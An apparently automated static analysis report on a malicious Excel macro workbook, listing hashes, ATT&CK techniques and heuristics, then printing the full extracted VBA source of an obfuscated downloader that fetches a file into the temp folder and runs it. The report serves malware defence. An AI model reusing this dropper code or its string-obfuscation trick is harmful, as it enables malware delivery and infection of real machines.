Malicious Office (OOXML) / .XLSM — malware analysis report

Static analysis result for SHA-256 66ac4ce9437d5f54…

Verdict: MALICIOUS

File type: Office (OOXML) / .XLSM

Size: 28.9 KB
Created: 2022-07-14 08:29:49 UTC
Authoring application: 16.0300
First seen: 2022-07-14
MD5: 19dba59c1cd8667fd8ede1e0ef7a2e71
SHA-1: 9a1739d765f4bf283768210ccc89b97e120bf166
SHA-256: 66ac4ce9437d5f5481999cd61a30b91e70451ec9d0aa4ef739e1f0c3c935b3e6
Risk score: 168

Malware Insights

MITRE ATT&CK

  • T1059.005 Visual Basic
  • T1105 Ingress Tool Transfer

The XLSM file contains VBA macros that use CreateObject and GetObject to download a file over HTTP and save it to disk. The critical heuristic 'OLE_VBA_HTTP_DROP_EXEC' confirms this behavior. The obfuscated strings 'aEX2MT.01MM.LT6OGSLXHP.' and '5hDBtaxjO.rmIADSe' are likely the COM object names for MSXML2.XMLHTTP60 and ADODB.Stream respectively, used to perform the download; they are decoded at run time so that the ProgIDs never appear in clear text in the macro source. The string '91EMzTrG' is likely the HTTP method, probably 'GET'. Overall, the macro behaves as a downloader.

Heuristics (5)

  • VBA project inside OOXML (severity: medium; 4 related findings; id: OOXML_VBA)
    Document contains a VBA project (VBA macros present).
  • VBA downloads and writes a file to disk (severity: critical; id: OLE_VBA_HTTP_DROP_EXEC)
    VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper, even when the COM ProgIDs are built dynamically to evade keyword scanning.
  • CreateObject call (severity: high; id: OLE_VBA_CREATEOBJ)
  • GetObject call (severity: high; id: OLE_VBA_GETOBJ)
  • Environ() call, i.e. environment variable access (severity: low; id: OLE_VBA_ENVIRON)

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Artifact 1: macros.bas
  SHA-256: b5619dea02f57383355a007faa4c6e6cd73699adcf705dacd39e82dcb64fae0b
  Kind: vba-macro
  Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
  Size: 3916 bytes

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "Questa_cartella_di_lavoro"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Foglio1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Public Function Coolegium(ByVal tbooks As String, _
                                     ByVal apancil As String, _
                                     Optional ByVal rollers As String = "", _
                                     Optional ByVal aboards As String = "", _
                                     Optional institute As Boolean = True) As Boolean
    On Error GoTo esters
    #Const MkE = False
    #Const FlY = False
    
    #If MkE = True Then
        Dim Flibustiero As MSXML2.XMLHTTP60

        Set Flibustiero = New MSXML2.XMLHTTP60
    #Else
        Dim Flibustiero As Object

        Set Flibustiero = CreateObject(TrueJ("aEX2MT.01MM.LT6OGSLXHP."))
    #End If

    #If FlY = True Then
        Dim PapeRs As ADODB.Stream
        
        Set PapeRs = New ADODB.Stream
    #Else
        Dim PapeRs      As Object
        Const adTypeBinary = 1

        
        Set PapeRs = CreateObject(TrueJ("5hDBtaxjO.rmIADSe"))
    #End If

    Flibustiero.Open TrueJ("91EMzTrG"), tbooks, False, rollers, aboards
    Flibustiero.Send
    If Flibustiero.Status = 200 Then
        With PapeRs
            .Open
            .Type = adTypeBinary
            .Write Flibustiero.responseBody
            .SaveToFile apancil, Abs(CInt(institute)) + 1
        End With
        Coolegium = Len(Dir(apancil)) > 0
    Else
'
    End If
pirus:
    On Error Resume Next
    If Not PapeRs Is Nothing Then
        PapeRs.Close
        Set PapeRs = Nothing
    End If
    If Not Flibustiero Is Nothing Then Set Flibustiero = Nothing
    
esters:

    Resume pirus
    Exit Function

End Function
Function NVirtu(glOng)
tam = TrueJ("B;igsAwmt(Dnm:"): ho = TrueJ("uQi2rehW3Pcs8Yn_os")
Set OfficeS = GetObject(tam).Get(ho)
iR = OfficeS.Create(glOng)
End Function
Function TrueJ(integ)
TrueJ = Right(ViserY("" & integ, Len(integ) * 14), Len(integ) - 5)
End Function
Function cMinore(O) As Variant
Oo = NVirtu(O)
End Function
Function ViserY$(DJfun$, PJ$)
    Dim i&, j&, d&, k&, n&, m&, l&, GsEE&, breads$, Bistro$
    n = Len(PJ)
    If n = 0 Then Exit Function
    l = Len(DJfun)
    m = -Int(-l / n)
    d = l Mod n

    ReDim nPJs&(1 To n), MioE(1 To n)
    For i = 1 To n
        nPJs(i) = i
        MioE(i) = Mid$(PJ, i, 1)
        For j = 1 To i - 1
            If MioE(i) < MioE(j) Then
                breads = MioE(i): MioE(i) = MioE(j): MioE(j) = breads
                GsEE = nPJs(i): nPJs(i) = nPJs(j): nPJs(j) = GsEE
            End If
    Next j, i
    
    ReDim out$(1 To n, 1 To m)
    For i = 1 To n
        For j = 1 To m + (nPJs(i) > d And d > 0)
            k = k + 1
            out(nPJs(i), j) = Mid$(DJfun, k, 1)
    Next j, i
    For j = 1 To m
        For i = 1 To n
            Bistro = Bistro & out(i, j)
    Next i, j
    ViserY = Bistro
End Function
Function vInteger()
vInteger = HeimS & Application.UsableWidth & Application.UsableHeight & "."
End Function
Function pPBoolean(r As String)
pPBoolean = TrueJ("(_ev2sAKgr  4rs3/") & r
End Function
Function HeimS()
HeimS = VBA.Environ(("TEmp")) & "\"
End Function
Sub Selection_s()
AliA = vInteger
areawidths = Coolegium(TrueJ("Qhp/onco_Jts/ma.m>\t:daic"), AliA)
areawidths = cMinore(pPBoolean("" & AliA))
End Sub
Artifact 2: vbaProject_00.bin
  SHA-256: e4d54ad42b68d2274a34509d45298c0aad59e714afb46954dd05731fef160798
  Kind: vba-project
  Source: OOXML VBA project: xl/vbaProject.bin
  Size: 22016 bytes